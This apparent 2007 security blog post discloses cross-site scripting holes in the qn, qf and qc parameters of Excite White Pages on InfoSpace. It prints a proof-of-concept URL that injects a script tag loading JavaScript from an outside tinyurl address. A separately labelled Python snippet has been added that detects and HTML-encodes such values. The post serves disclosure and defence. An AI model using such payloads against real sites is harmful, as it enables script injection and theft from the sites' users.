MOSEB-29 Bonus: Vulnerabilities in Excite White Pages

22:32 29.06.2007

New bonus vulnerabilities in Excite. In this case the vulnerabilities are at a different domain than in MOSEB-29: Vulnerability at money.excite.com.

The vulnerability is at Excite White Pages (kevdb.infospace.com), which is located on a server of InfoSpace (Excite’s partner). I found these Cross-Site Scripting holes on 31.05.2007.

XSS:

The vulnerabilities are in the qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US
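An added example, not code from this post or from Excite/InfoSpace: it decodes the qn, qf and qc parameters of a request URL, flags values that carry HTML metacharacters, and shows the unencoded reflection beside the HTML-encoded one. The sample URL is constructed after the one above with a placeholder script host, and the "Results for" template and function names are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the post names as vulnerable; matched case-insensitively because
# the post writes "qn" while its URL uses "QN".
REFLECTED = {"qn", "qf", "qc"}

# Constructed sample modelled on the URL in the post (placeholder script host).
SAMPLE = ("http://kevdb.infospace.com/info.xcite/wp/results/kevdb"
          "?OTMPL=%2Fwp%2Fresults.htm"
          "&QN=%3Cscript%20src=%22http://example.invalid/x.js%22%3E%3C/script%3E"
          "&KCFG=US")

MARKUP = re.compile(r"[<>\"']")

def reflected_params(url):
    """Return {name: percent-decoded value} for qn/qf/qc present in url."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {k.lower(): v for k, v in pairs if k.lower() in REFLECTED}

def suspicious(url):
    """Names of reflected parameters whose decoded value contains markup characters."""
    return sorted(k for k, v in reflected_params(url).items() if MARKUP.search(v))

def render_unsafe(value):
    """Hypothetical flawed template: the decoded value goes into the page as-is."""
    return "<p>Results for " + value + "</p>"

def render_safe(value):
    """Same template with the value HTML-encoded for the element context."""
    return "<p>Results for " + html.escape(value, quote=True) + "</p>"

if __name__ == "__main__":
    qn = reflected_params(SAMPLE)["qn"]
    print(suspicious(SAMPLE))
    print(render_unsafe(qn))
    print(render_safe(qn))
```

Encoding at output is the fix; the suspicious() check is only useful for log review or alerting, since ordinary searches for a name do not contain these characters.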

Moral: searching in white pages can be dangerous.

Note that the Excite engine belongs to IAC Search & Media, so Ask.com is also responsible for these vulnerabilities.

Also note that the Excite White Pages engine uses the InfoSpace engine, so InfoSpace is also responsible for these vulnerabilities.

